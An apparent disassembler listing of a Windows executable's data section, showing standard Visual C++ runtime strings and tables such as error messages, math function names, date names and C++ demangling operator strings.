		dd 50h,	38202800h, 8075850h, 30303700h,	75057h,	8202000h
		dd 0
		dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
		dd 8000008h, 7000800h, 8
aCorexitprocess	db 'CorExitProcess',0   ; DATA XREF: sub_407E41+Fo
		align 4
aMscoree_dll	db 'mscoree.dll',0      ; DATA XREF: sub_407E41o
aCcs		db 'ccs=',0             ; DATA XREF: sub_4087BF+1CCo
		align 4
aUtf8		db 'UTF-8',0            ; DATA XREF: sub_4087BF+1E0o
		align 10h
aUtf16le	db 'UTF-16LE',0         ; DATA XREF: sub_4087BF:loc_4089BCo
		align 4
aUnicode	db 'UNICODE',0          ; DATA XREF: sub_4087BF:loc_4089D9o
aRuntimeError	db 'runtime error ',0
		align 4
		db 0Dh,0Ah,0
		align 4
aTlossError	db 'TLOSS error',0Dh,0Ah,0
		align 4
aSingError	db 'SING error',0Dh,0Ah,0
		align 4
aDomainError	db 'DOMAIN error',0Dh,0Ah,0
		align 4
aR6034AnApplica	db 'R6034',0Dh,0Ah
		db 'An application has made an attempt to load the C runtime library '
		db 'incorrectly.',0Ah
		db 'Please contact the application',27h,'s support team for more informa'
		db 'tion.',0Dh,0Ah,0
		align 8
aR6033AttemptTo	db 'R6033',0Dh,0Ah
		db '- Attempt to use MSIL code from this assembly during native code '
		db 'initialization',0Ah
		db 'This indicates a bug in your application. It is most likely the r'
		db 'esult of calling an MSIL-compiled (/clr) function from a native c'
		db 'onstructor or from DllMain.',0Dh,0Ah,0
		align 10h
aR6032NotEnough	db 'R6032',0Dh,0Ah
		db '- not enough space for locale information',0Dh,0Ah,0
		align 8
aR6031AttemptTo	db 'R6031',0Dh,0Ah
		db '- Attempt to initialize the CRT more than once.',0Ah
		db 'This indicates a bug in your application.',0Dh,0Ah,0
		align 4
aR6030CrtNotIni	db 'R6030',0Dh,0Ah
		db '- CRT not initialized',0Dh,0Ah,0
		align 4
aR6028UnableToI	db 'R6028',0Dh,0Ah
		db '- unable to initialize heap',0Dh,0Ah,0
		align 4
aR6027NotEnough	db 'R6027',0Dh,0Ah
		db '- not enough space for lowio initialization',0Dh,0Ah,0
		align 4
aR6026NotEnough	db 'R6026',0Dh,0Ah
		db '- not enough space for stdio initialization',0Dh,0Ah,0
		align 4
aR6025PureVirtu	db 'R6025',0Dh,0Ah
		db '- pure virtual function call',0Dh,0Ah,0
		align 4
aR6024NotEnough	db 'R6024',0Dh,0Ah
		db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
		align 4
aR6019UnableToO	db 'R6019',0Dh,0Ah
		db '- unable to open console device',0Dh,0Ah,0
		align 10h
aR6018Unexpecte	db 'R6018',0Dh,0Ah
		db '- unexpected heap error',0Dh,0Ah,0
		align 4
aR6017Unexpecte	db 'R6017',0Dh,0Ah
		db '- unexpected multithread lock error',0Dh,0Ah,0
		align 4
aR6016NotEnough	db 'R6016',0Dh,0Ah
		db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio	db 0Dh,0Ah
		db 'This application has requested the Runtime to terminate it in an '
		db 'unusual way.',0Ah
		db 'Please contact the application',27h,'s support team for more informa'
		db 'tion.',0Dh,0Ah,0
		align 4
aR6009NotEnough	db 'R6009',0Dh,0Ah
		db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough	db 'R6008',0Dh,0Ah
		db '- not enough space for arguments',0Dh,0Ah,0
		align 10h
aR6002FloatingP	db 'R6002',0Dh,0Ah      ; DATA XREF: .data:off_424C04o
		db '- floating point not loaded',0Dh,0Ah,0
		align 4
aMicrosoftVisua	db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_40A074+157o
		align 10h
asc_41EB30	db 0Ah			; DATA XREF: sub_40A074:loc_40A184o
		db 0Ah,0
		align 4
a___		db '...',0              ; DATA XREF: sub_40A074+E8o
aProgramNameUnk	db '<program name unknown>',0 ; DATA XREF: sub_40A074+A3o
		align 10h
aRuntimeErrorPr	db 'Runtime Error!',0Ah ; DATA XREF: sub_40A074+5Bo
		db 0Ah
		db 'Program: ',0
		align 4
		dd 2 dup(0)
		dd 7FF00000h, 0
		dd 0FFF00000h, 0
		dd 7FE00000h, 0
		dd 200000h, 3 dup(0)
		dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h,	0FFC00000h
		dd 0
		dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h,	8DA24260h
		dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41EBD8	dd 6E6174h		; DATA XREF: sub_40AC3F:loc_40AE77o
dword_41EBDC	dd 736F63h		; DATA XREF: sub_40AC3F:loc_40AE6Eo
dword_41EBE0	dd 6E6973h		; DATA XREF: sub_40AC3F:loc_40AE65o
aModf		db 'modf',0             ; DATA XREF: sub_40AC3F:loc_40AE59o
		align 4
aFloor		db 'floor',0            ; DATA XREF: sub_40AC3F:loc_40AE4Do
		align 4
aCeil		db 'ceil',0             ; DATA XREF: sub_40AC3F:loc_40AE44o
		align 4
aAtan		db 'atan',0             ; DATA XREF: sub_40AC3F:loc_40AE3Bo
		align 4
aExp10		db 'exp10',0            ; DATA XREF: sub_40AC3F+1BFo
		align 10h
dbl_41EC10	dq 1.0			; DATA XREF: sub_40AF03+6Dr
aAcos		db 'acos',0             ; DATA XREF: sub_40AC3F:loc_40ADC2o
		align 10h
aAsin		db 'asin',0             ; DATA XREF: sub_40AC3F:loc_40ADB9o
		align 4
aLog		db 'log',0              ; DATA XREF: sub_40AC3F:loc_40AD7Co
					; sub_40AC3F+149o ...
aLog10		db 'log10',0            ; DATA XREF: sub_40AC3F:loc_40AD55o
					; sub_40AC3F+131o ...
		align 4
aExp		db 'exp',0              ; DATA XREF: sub_40AC3F:loc_40AD1Co
					; sub_40AC3F+10Do ...
aPow		db 'pow',0              ; DATA XREF: sub_40AC3F:loc_40ACE7o
					; sub_40AC3F:loc_40AD94o ...
off_41EC3C	dd offset sub_40B982	; DATA XREF: sub_406C00+F1r
					; sub_406C00+FAo ...
		dd offset dword_42213C
off_41EC44	dd offset loc_40B79A	; DATA XREF: sub_40B78Fo
					; .text:0040B79Do ...
		dd offset sub_40326E
dword_41EC4C	dd 20646162h, 65637865h, 6F697470h, 6Eh	; DATA XREF: sub_40BFC7+156o
dword_41EC5C	dd 41h dup(0)		; DATA XREF: sub_40C517+25o
					; sub_40C8FC+27o
asc_41ED60:				; DATA XREF: .data:off_424668o
					; .data:00424E70o
		unicode	0, <	     (((((		    H>
		dw 10h
		dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
		dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
		dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
		dd 100010h, 200010h, 40h dup(0)
dword_41EF60	dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
					; DATA XREF: .data:00424E74o
					; .data:00424590o
		dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
		dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
		dd 3 dup(100010h), 3 dup(1820182h), 0Ah	dup(1020102h)
		dd 2 dup(100010h), 10h dup(200020h), 480020h, 8	dup(100010h)
		dd 140010h, 100014h, 2 dup(100010h), 100014h, 2	dup(100010h)
		dd 1010010h, 0Bh dup(1010101h),	1010010h, 3 dup(1010101h)
		dd 0Ch dup(1020102h), 1020010h,	3 dup(1020102h), 1010102h
		dd 0
dword_41F168	dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
		dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h,	0A7A6A5A4h
		dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
		dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
		dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
		dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
		dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
		dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
		dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
		dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
		dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
		dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
		dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
		dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
		dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
		dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
		dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
		dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
		dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
		dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h,	8F8E8D8Ch
		dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
		dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
		dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
		dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
		dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
		dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
		dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
		dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
		dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
		dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
		dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
		dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
		dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
		dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h,	0A7A6A5A4h
		dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
		dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
		dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
		dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
		dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy	db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00424F1Co
aMmDdYy		db 'MM/dd/yy',0         ; DATA XREF: .data:00424F18o
		align 4
aPm		db 'PM',0               ; DATA XREF: .data:00424F14o
		align 4
aAm		db 'AM',0               ; DATA XREF: .data:00424F10o
		align 4
aDecember	db 'December',0         ; DATA XREF: .data:00424F0Co
		align 4
aNovember	db 'November',0         ; DATA XREF: .data:00424F08o
		align 4
aOctober	db 'October',0          ; DATA XREF: .data:00424F04o
aSeptember	db 'September',0        ; DATA XREF: .data:00424F00o
		align 4
aAugust		db 'August',0           ; DATA XREF: .data:00424EFCo
		align 10h
aJuly		db 'July',0             ; DATA XREF: .data:00424EF8o
		align 4
aJune		db 'June',0             ; DATA XREF: .data:00424EF4o
		align 10h
aApril		db 'April',0            ; DATA XREF: .data:00424EECo
		align 4
aMarch		db 'March',0            ; DATA XREF: .data:00424EE8o
		align 10h
aFebruary	db 'February',0         ; DATA XREF: .data:00424EE4o
		align 4
aJanuary	db 'January',0          ; DATA XREF: .data:00424EE0o
aDec		db 'Dec',0              ; DATA XREF: .data:00424EDCo
aNov		db 'Nov',0              ; DATA XREF: .data:00424ED8o
aOct		db 'Oct',0              ; DATA XREF: .data:00424ED4o
aSep		db 'Sep',0              ; DATA XREF: .data:00424ED0o
aAug		db 'Aug',0              ; DATA XREF: .data:00424ECCo
aJul		db 'Jul',0              ; DATA XREF: .data:00424EC8o
aJun		db 'Jun',0              ; DATA XREF: .data:00424EC4o
aMay		db 'May',0              ; DATA XREF: .data:00424EC0o
					; .data:00424EF0o
aApr		db 'Apr',0              ; DATA XREF: .data:00424EBCo
aMar		db 'Mar',0              ; DATA XREF: .data:00424EB8o
aFeb		db 'Feb',0              ; DATA XREF: .data:00424EB4o
aJan		db 'Jan',0              ; DATA XREF: .data:00424EB0o
aSaturday	db 'Saturday',0         ; DATA XREF: .data:00424EACo
		align 10h
aFriday		db 'Friday',0           ; DATA XREF: .data:00424EA8o
		align 4
aThursday	db 'Thursday',0         ; DATA XREF: .data:00424EA4o
		align 4
aWednesday	db 'Wednesday',0        ; DATA XREF: .data:00424EA0o
		align 10h
aTuesday	db 'Tuesday',0          ; DATA XREF: .data:00424E9Co
aMonday		db 'Monday',0           ; DATA XREF: .data:00424E98o
		align 10h
aSunday		db 'Sunday',0           ; DATA XREF: .data:00424E94o
		align 4
aSat		db 'Sat',0              ; DATA XREF: .data:00424E90o
aFri		db 'Fri',0              ; DATA XREF: .data:00424E8Co
aThu		db 'Thu',0              ; DATA XREF: .data:00424E88o
aWed		db 'Wed',0              ; DATA XREF: .data:00424E84o
aTue		db 'Tue',0              ; DATA XREF: .data:00424E80o
aMon		db 'Mon',0              ; DATA XREF: .data:00424E7Co
aSun		db 'Sun',0              ; DATA XREF: .data:off_424E78o
aInitializecrit	db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40D0D4+53o
		align 4
aKernel32_dl_10	db 'kernel32.dll',0     ; DATA XREF: sub_40D0D4+44o
		align 4
aCompleteObject	db ' Complete Object Locator',27h,0 ; DATA XREF: jlrllt49:0041FBA4o
		align 4
aClassHierarchy	db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: jlrllt49:0041FBA0o
		align 4
aBaseClassArray	db ' Base Class Array',27h,0 ; DATA XREF: jlrllt49:0041FB9Co
		align 4
aBaseClassDescr	db ' Base Class Descriptor at (',0 ; DATA XREF: jlrllt49:0041FB98o
aTypeDescriptor	db ' Type Descriptor',27h,0 ; DATA XREF: jlrllt49:0041FB94o
		align 4
aLocalStaticThr	db '`local static thread guard',27h,0 ; DATA XREF: jlrllt49:0041FCE0o
aManagedVectorC	db '`managed vector copy constructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FCDCo
		align 4
aVectorVbaseCop	db '`vector vbase copy constructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FCD8o
		align 10h
aVectorCopyCons	db '`vector copy constructor iterator',27h,0 ; DATA XREF: jlrllt49:0041FCD4o
		align 4
aDynamicAtexitD	db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: jlrllt49:0041FCD0o
		align 4
aDynamicInitial	db '`dynamic initializer for ',27h,0 ; DATA XREF: jlrllt49:0041FCCCo
		align 4
aEhVectorVbaseC	db '`eh vector vbase copy constructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FCC8o
aEhVectorCopyCo	db '`eh vector copy constructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FCC4o
		align 4
aManagedVectorD	db '`managed vector destructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FCC0o
		align 10h
aManagedVecto_0	db '`managed vector constructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FCBCo
		align 4
aPlacementDelet	db '`placement delete[] closure',27h,0 ; DATA XREF: jlrllt49:0041FCB8o
		align 4
aPlacementDel_0	db '`placement delete closure',27h,0 ; DATA XREF: jlrllt49:0041FCB4o
		align 4
aOmniCallsig	db '`omni callsig',27h,0 ; DATA XREF: jlrllt49:0041FCB0o
		align 4
aDelete		db ' delete[]',0        ; DATA XREF: jlrllt49:0041FCACo
		align 10h
aNew		db ' new[]',0           ; DATA XREF: jlrllt49:0041FCA8o
		align 4
aLocalVftableCo	db '`local vftable constructor closure',27h,0
					; DATA XREF: jlrllt49:0041FCA4o
aLocalVftable	db '`local vftable',27h,0 ; DATA XREF: jlrllt49:0041FCA0o
aRtti		db '`RTTI',0            ; DATA XREF: jlrllt49:0041FC9Co
		align 4
off_41F864	dd offset dword_484560	; DATA XREF: jlrllt49:0041FC98o
aUdtReturning	db '`udt returning',27h,0 ; DATA XREF: jlrllt49:0041FC94o
aCopyConstructo	db '`copy constructor closure',27h,0 ; DATA XREF: jlrllt49:0041FC90o
		align 4
aEhVectorVbas_0	db '`eh vector vbase constructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FC8Co
		align 4
aEhVectorDestru	db '`eh vector destructor iterator',27h,0 ; DATA XREF: jlrllt49:0041FC88o
aEhVectorConstr	db '`eh vector constructor iterator',27h,0 ; DATA XREF: jlrllt49:0041FC84o
		align 10h
aVirtualDisplac	db '`virtual displacement map',27h,0 ; DATA XREF: jlrllt49:0041FC80o
		align 4
aVectorVbaseCon	db '`vector vbase constructor iterator',27h,0
					; DATA XREF: jlrllt49:0041FC7Co
aVectorDestruct	db '`vector destructor iterator',27h,0 ; DATA XREF: jlrllt49:0041FC78o
		align 10h
aVectorConstruc	db '`vector constructor iterator',27h,0 ; DATA XREF: jlrllt49:0041FC74o
		align 10h
aScalarDeleting	db '`scalar deleting destructor',27h,0 ; DATA XREF: jlrllt49:0041FC70o
		align 10h
aDefaultConstru	db '`default constructor closure',27h,0 ; DATA XREF: jlrllt49:0041FC6Co
		align 10h
aVectorDeleting	db '`vector deleting destructor',27h,0 ; DATA XREF: jlrllt49:0041FC68o
		align 10h
aVbaseDestructo	db '`vbase destructor',27h,0 ; DATA XREF: jlrllt49:0041FC64o
		align 4
aString		db '`string',27h,0      ; DATA XREF: jlrllt49:0041FC60o
		align 10h
aLocalStaticGua	db '`local static guard',27h,0 ; DATA XREF: jlrllt49:0041FC5Co
		align 4
aTypeof		db '`typeof',27h,0      ; DATA XREF: jlrllt49:0041FC58o
		align 4
aVcall		db '`vcall',27h,0       ; DATA XREF: jlrllt49:0041FC54o
aVbtable	db '`vbtable',27h,0     ; DATA XREF: jlrllt49:0041FC50o
		align 4
aVftable	db '`vftable',27h,0     ; DATA XREF: jlrllt49:0041FC4Co
		align 4
asc_41FA44	db '^=',0               ; DATA XREF: jlrllt49:0041FC48o
		align 4
asc_41FA48	db '|=',0               ; DATA XREF: jlrllt49:0041FC44o
		align 4
asc_41FA4C	db '&=',0               ; DATA XREF: jlrllt49:0041FC40o
		align 10h
asc_41FA50	db '<<=',0              ; DATA XREF: jlrllt49:0041FC3Co
asc_41FA54	db '>>=',0              ; DATA XREF: jlrllt49:0041FC38o
asc_41FA58	db '%=',0               ; DATA XREF: jlrllt49:0041FC34o
		align 4
asc_41FA5C	db '/=',0               ; DATA XREF: jlrllt49:0041FC30o
		align 10h
asc_41FA60	db '-=',0               ; DATA XREF: jlrllt49:0041FC2Co
		align 4
asc_41FA64	db '+=',0               ; DATA XREF: jlrllt49:0041FC28o
		align 4
asc_41FA68	db '*=',0               ; DATA XREF: jlrllt49:0041FC24o
		align 4
asc_41FA6C	db '||',0               ; DATA XREF: jlrllt49:0041FC20o
		align 10h
asc_41FA70	db '&&',0               ; DATA XREF: jlrllt49:0041FC1Co
		align 4
asc_41FA74:				; DATA XREF: jlrllt49:0041FC18o
		unicode	0, <|>,0
asc_41FA78:				; DATA XREF: jlrllt49:0041FC14o
		unicode	0, <^>,0
asc_41FA7C:				; DATA XREF: jlrllt49:0041FC10o
		unicode	0, <~>,0
asc_41FA80	db '()',0               ; DATA XREF: jlrllt49:0041FC0Co
		align 4
asc_41FA84:				; DATA XREF: jlrllt49:0041FC08o
		unicode	0, <,>,0
asc_41FA88	db '>=',0               ; DATA XREF: jlrllt49:0041FC04o
		align 4
asc_41FA8C:				; DATA XREF: jlrllt49:0041FC00o
		dw 3Eh
		unicode	0, <>,0
asc_41FA90	db '<=',0               ; DATA XREF: jlrllt49:0041FBFCo
		align 4
asc_41FA94:				; DATA XREF: jlrllt49:0041FBF8o
		dw 3Ch
		unicode	0, <>,0
asc_41FA98:				; DATA XREF: jlrllt49:0041FBF4o
		unicode	0, <%>,0
asc_41FA9C:				; DATA XREF: jlrllt49:0041FBF0o
		unicode	0, </>,0
asc_41FAA0	db '->*',0              ; DATA XREF: jlrllt49:0041FBECo
asc_41FAA4:				; DATA XREF: jlrllt49:0041FBE8o
		unicode	0, <&>,0
asc_41FAA8:				; DATA XREF: jlrllt49:0041FBE4o
		unicode	0, <+>,0
asc_41FAAC:				; DATA XREF: jlrllt49:0041FBE0o
		unicode	0, <->,0
asc_41FAB0	db '--',0               ; DATA XREF: jlrllt49:0041FBDCo
		align 4
asc_41FAB4	db '++',0               ; DATA XREF: jlrllt49:0041FBD8o
		align 4
asc_41FAB8:				; DATA XREF: jlrllt49:0041FBD4o
		unicode	0, <*>,0
asc_41FABC	db '->',0               ; DATA XREF: jlrllt49:0041FBD0o
		align 10h
aOperator	db 'operator',0         ; DATA XREF: jlrllt49:0041FBCCo
		align 4
asc_41FACC	db '[]',0               ; DATA XREF: jlrllt49:0041FBC8o
		align 10h
asc_41FAD0	db '!=',0               ; DATA XREF: jlrllt49:0041FBC4o
		align 4
asc_41FAD4	db '==',0               ; DATA XREF: jlrllt49:0041FBC0o
		align 4
asc_41FAD8:				; DATA XREF: jlrllt49:0041FBBCo
		unicode	0, <!>,0
asc_41FADC	db '<<',0               ; DATA XREF: jlrllt49:0041FBB8o
		align 10h
asc_41FAE0	db '>>',0               ; DATA XREF: jlrllt49:0041FBB4o
		align 4
aDelete_0	db ' delete',0          ; DATA XREF: jlrllt49:0041FBACo
aNew_0		db ' new',0             ; DATA XREF: jlrllt49:0041FBA8o
		align 4
a__unaligned	db '__unaligned',0      ; DATA XREF: jlrllt49:0041FB8Co
a__restrict	db '__restrict',0       ; DATA XREF: jlrllt49:0041FB88o
		align 4
; a__ptr64
a__ptr64	db '__ptr64',0          ; DATA XREF: jlrllt49:0041FB84o
a__clrcall	db '__clrcall',0        ; DATA XREF: jlrllt49:0041FB80o
		align 10h
a__fastcall	db '__fastcall',0       ; DATA XREF: jlrllt49:0041FB7Co
		align 4
a__thiscall	db '__thiscall',0       ; DATA XREF: jlrllt49:0041FB78o
		align 4
a__stdcall	db '__stdcall',0        ; DATA XREF: jlrllt49:0041FB74o
		align 4
a__pascal	db '__pascal',0         ; DATA XREF: jlrllt49:0041FB70o
		align 10h
a__cdecl	db '__cdecl',0          ; DATA XREF: jlrllt49:0041FB6Co
a__based	db '__based(',0         ; DATA XREF: jlrllt49:0041FB68o
		align 8
		dd offset a__based	; "__based("
		dd offset a__cdecl	; "__cdecl"
		dd offset a__pascal	; "__pascal"
		dd offset a__stdcall	; "__stdcall"
		dd offset a__thiscall	; "__thiscall"
		dd offset a__fastcall	; "__fastcall"
		dd offset a__clrcall	; "__clrcall"
		dd offset a__ptr64	; "__ptr64"
		dd offset a__restrict	; "__restrict"
		dd offset a__unaligned	; "__unaligned"
		dd offset word_41E4A2
		dd offset aTypeDescriptor ; " Type Descriptor'"
		dd offset aBaseClassDescr ; " Base Class Descriptor at ("
		dd offset aBaseClassArray ; " Base Class Array'"
		dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
		dd offset aCompleteObject ; " Complete Object Locator'"
		dd offset aNew_0	; " new"
		dd offset aDelete_0	; " delete"
		dd offset byte_41E4A0
		dd offset asc_41FAE0	; ">>"
		dd offset asc_41FADC	; "<<"
		dd offset asc_41FAD8	; "!"
		dd offset asc_41FAD4	; "=="
		dd offset asc_41FAD0	; "!="
		dd offset asc_41FACC	; "[]"
		dd offset aOperator	; "operator"
		dd offset asc_41FABC	; "->"
		dd offset asc_41FAB8	; "*"
		dd offset asc_41FAB4	; "++"
		dd offset asc_41FAB0	; "--"
		dd offset asc_41FAAC	; "-"
		dd offset asc_41FAA8	; "+"
		dd offset asc_41FAA4	; "&"
		dd offset asc_41FAA0	; "->*"
		dd offset asc_41FA9C	; "/"
		dd offset asc_41FA98	; "%"
		dd offset asc_41FA94	; "<"
		dd offset asc_41FA90	; "<="
		dd offset asc_41FA8C	; ">"
		dd offset asc_41FA88	; ">="
		dd offset asc_41FA84	; ","
		dd offset asc_41FA80	; "()"
		dd offset asc_41FA7C	; "~"
		dd offset asc_41FA78	; "^"
		dd offset asc_41FA74	; "|"
		dd offset asc_41FA70	; "&&"
		dd offset asc_41FA6C	; "||"
		dd offset asc_41FA68	; "*="
		dd offset asc_41FA64	; "+="
		dd offset asc_41FA60	; "-="
		dd offset asc_41FA5C	; "/="
		dd offset asc_41FA58	; "%="
		dd offset asc_41FA54	; ">>="
		dd offset asc_41FA50	; "<<="
		dd offset asc_41FA4C	; "&="
		dd offset asc_41FA48	; "|="
		dd offset asc_41FA44	; "^="
		dd offset aVftable	; "`vftable'"
		dd offset aVbtable	; "`vbtable'"
		dd offset aVcall	; "`vcall'"
		dd offset aTypeof	; "`typeof'"
		dd offset aLocalStaticGua ; "`local static guard'"
		dd offset aString	; "`string'"
		dd offset aVbaseDestructo ; "`vbase destructor'"
		dd offset aVectorDeleting ; "`vector deleting destructor'"
		dd offset aDefaultConstru ; "`default constructor closure'"
		dd offset aScalarDeleting ; "`scalar deleting destructor'"
		dd offset aVectorConstruc ; "`vector constructor iterator'"
		dd offset aVectorDestruct ; "`vector destructor	iterator'"
		dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
		dd offset aVirtualDisplac ; "`virtual displacement map'"
		dd offset aEhVectorConstr ; "`eh vector	constructor iterator'"
		dd offset aEhVectorDestru ; "`eh vector	destructor iterator'"
		dd offset aEhVectorVbas_0 ; "`eh vector	vbase constructor iterator'"
		dd offset aCopyConstructo ; "`copy constructor closure'"
		dd offset aUdtReturning	; "`udt	returning'"
		dd offset off_41F864
		dd offset aRtti		; "`RTTI"
		dd offset aLocalVftable	; "`local vftable'"
		dd offset aLocalVftableCo ; "`local vftable constructor	closure'"
		dd offset aNew		; " new[]"
		dd offset aDelete	; " delete[]"
		dd offset aOmniCallsig	; "`omni callsig'"
		dd offset aPlacementDel_0 ; "`placement	delete closure'"
		dd offset aPlacementDelet ; "`placement	delete[] closure'"
		dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
		dd offset aManagedVectorD ; "`managed vector destructor	iterator'"
		dd offset aEhVectorCopyCo ; "`eh vector	copy constructor iterator'"
		dd offset aEhVectorVbaseC ; "`eh vector	vbase copy constructor itera"...
		dd offset aDynamicInitial ; "`dynamic initializer for '"
		dd offset aDynamicAtexitD ; "`dynamic atexit destructor	for '"
		dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
		dd offset aVectorVbaseCop ; "`vector vbase copy	constructor iterator"...
		dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
		dd offset aLocalStaticThr ; "`local static thread guard'"
		dd offset word_41E4A2
		dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
		dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
		dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp	db '`h`hhh',8,8,7,'xppwpp',8,8,0
		dw 800h
		dd 7000800h, 8
aGetprocesswind	db 'GetProcessWindowStation',0 ; DATA XREF: sub_40FAE4+C1o
aGetuserobjecti	db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40FAE4+A9o
		align 4
aGetlastactivep	db 'GetLastActivePopup',0 ; DATA XREF: sub_40FAE4+6Do
		align 4
aGetactivewindo	db 'GetActiveWindow',0  ; DATA XREF: sub_40FAE4+58o
aMessageboxa	db 'MessageBoxA',0      ; DATA XREF: sub_40FAE4+46o
aUser32_dll_0	db 'USER32.DLL',0       ; DATA XREF: sub_40FAE4+28o
		align 4
off_41FDB4	dd offset sub_40FD2B	; DATA XREF: sub_407F39r sub_407F39+9o ...
		dd offset nullsub_445
		dd offset nullsub_445
a_nextafter	db '_nextafter',0
		align 4
a_logb		db '_logb',0
		align 4
a_yn		db '_yn',0
a_y1		db '_y1',0
a_y0		db '_y0',0
aFrexp		db 'frexp',0
		align 4
aFmod		db 'fmod',0
		align 10h
a_hypot		db '_hypot',0
		align 4
a_cabs		db '_cabs',0
		align 10h
aLdexp		db 'ldexp',0
		align 4
aFabs		db 'fabs',0
		align 10h
aSqrt		db 'sqrt',0
		align 4
aAtan2		db 'atan2',0
		align 10h
aTanh		db 'tanh',0
		align 4
aCosh		db 'cosh',0
		align 10h
aSinh		db 'sinh',0
		align 4
dbl_41FE38	dq 0.0			; DATA XREF: sub_4100E0+143r
aSunmontuewedth	db 'SunMonTueWedThuFriSat',0
		align 4
aJanfebmaraprma	db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
		align 10h
aE000		db 'e+000',0            ; DATA XREF: sub_411014:loc_4110ECo
		align 4
